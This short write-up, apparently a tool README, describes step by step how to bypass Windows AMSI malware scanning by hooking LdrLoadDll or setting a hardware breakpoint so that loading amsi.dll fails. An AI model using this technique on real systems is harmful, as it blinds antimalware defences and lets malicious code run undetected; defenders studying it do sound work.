Bypassing AMSI using LdrLoadDll, either through hooking or by utilizing a hardware breakpoint.
LdrLoadDll is the final destination for all WinAPI functions such as LoadLibraryA, LoadLibraryW, LoadLibraryExA, and LoadLibraryExW before the DLL is actually loaded into the process's address space. This means that by hooking LdrLoadDll, we effectively hook all these WinAPI functions.
A Look at CoreCLR source code
By examining the CoreCLR , which is the CLR runtime for .NET Core, it can be seen that when a buffer is scanned by AMSI, amsi.dll is loaded first, followed by the scanning process using AmsiScanBuffer. If the initialization fails, it returns that the content is not detected. It can be assumed that this is also the case for the .NET Framework CLR.
Amsi::IsBlockedByAmsiScan
when amsi.dll is loaded using LdrLoadDll, we return an 'Access Denied' error, effectively bypassing AMSI."
-
Resolve the address of LdrLoadDll and register a hardware breakpoint on it. When our exception handler is invoked, retrieve the dllName argument, which is the third argument located in the r8 register in the x64 architecture. Check if the dllName contains amsi.dll. If it does, obtain the return address from the stack, manually pop the return address from the stack, and return an 'Access Denied' response in the rax register. This will prevent amsi.dll from loading, effectively bypassing AMSI.
-
By inserting a hook into LdrLoadDll, we can redirect to our own version of LdrLoadDll using an unconditional jump instruction. This allows us to inspect the dllName argument; if the DLL being loaded is amsi.dll, we simply return an 'Access Denied' response, thereby bypassing AMSI.
-
